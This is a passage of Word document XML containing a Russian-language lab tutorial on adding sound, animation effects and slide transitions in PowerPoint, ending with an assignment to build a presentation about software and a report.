        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В появившемся диалоговом окне укажите папку, из которой будет вставляться музыка, и тип звукового файла. Затем установите способ воспроизведения звука: автоматически или по щелчку. В появившейся вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Работа со звуком</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> найдите группу </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры звука</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и установите желаемые команды.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2145095" cy="1231200"/>
            <wp:effectExtent l="19050" t="0" r="7555" b="0"/>
            <wp:docPr id="24862" name="Рисунок 24862" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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62" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image165.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId504" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2146577" cy="1232051"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вставка звука в презентацию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Полезный совет:</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не переборщите с громкостью звука, иначе речь будет плохо слышна.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для музыкального сопровождения презентации лучше выбирать спокойную инструментальную или классическую музыку. Это не будет отвлекать слушателей от содержания презентации, а только добавит эмоциональности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 8. </w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавление эффектов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Презентацию PowerPoint можно значительно разнообразить, используя эффекты анимации, которые можно добавить к любому объекту на слайде. Для этого по вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анимация</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> перейдите в группу </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анимация</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и откройте область задач </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка анимации</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Затем щ</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">лкните по тексту или объекту, которому нужно придать анимацию. В области задач </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка анимации</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавить эффект</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а затем выполните одно или несколько действий по использованию эффектов. Эффекты появятся в списке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка анимации</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в порядке их добавления. В поле </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменение эффекта</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно установить начало анимации, е</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> направление и скорость.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2011350" cy="1391648"/>
            <wp:effectExtent l="19050" t="0" r="7950" b="0"/>
            <wp:docPr id="24882" name="Рисунок 24882" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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2" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image166.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId505" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2014402" cy="1393760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вставка анимации в PowerPoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Полезный совет:</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не следует перенасыщать презентацию спецэффектами. Чрезмерное обилие мигающих, вертящихся и скачущих объектов, посторонних звуков, анимационных картинок отвлекает слушателей и мешает им удерживать внимание на основном содержании выступления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Помните, что анимация используется по минимуму и лишь тогда, когда на ней лежит функциональная нагрузка.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С помощью анимации хорошо выделять ключевые слова, цифры, обозначать выводы. Будет лучше, если анимация настроена на выделение цветом, а не наразного рода движения букв на экране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007755F7" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Переходы между слайдами делают презентацию PowerPoint более эффектной. Чтобы добавить одинаковые переходы между слайдами презентации, на вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анимация</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> щелкните по эскизу слайда и в группе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Переход к следующему слайду</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выберите эффект смены слайдов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2203370" cy="1202400"/>
            <wp:effectExtent l="19050" t="0" r="6430" b="0"/>
            <wp:docPr id="24883" name="Рисунок 24883" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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3" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image167.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId506" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2207394" cy="1204596"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбор эф</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">фекта перехода на новый слайд в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerPoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы установить скорость смены слайдов, в группе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Переход к следующему слайду</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> раскройте кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Скорость перехода</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а затем выберите нужную скорость. В группе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Смена слайда</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> укажите порядок смены: по щелчку или автоматически.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">К смене слайдов можно добавить и звук. Для этого на вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анимация</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в группе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Переход к следующему слайду</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> раскройте кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Звук перехода</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и, чтобы добавить звук из списка, выберите нужный звук. Чтобы добавить звук, которого нет в списке, выберите команду </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Другой звук</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. В открывшемся окне выберите звуковой файл, который нужно добавить, а затем нажмите кнопку ОК.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7230" w:rsidRPr="00617AC0" w:rsidRDefault="002E7230" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidR="00885449" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00885449" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать презентацию и подготовить ее к демонстрации</w:t>
      </w:r>
      <w:r w:rsidR="00137383" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00137383" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Необходимо реализовать из наработок готовую презентацию. Для этого нужно следовать методическим рекомендациям, приведенным в теоретической части. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Темой презентации становится програ</w:t>
      </w:r>
      <w:r w:rsidR="00885449" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ммное обеспечение</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Готовая презентация. Отчет, содержащий этапы разработки презентации.</w:t>
      </w:r>
    </w:p>
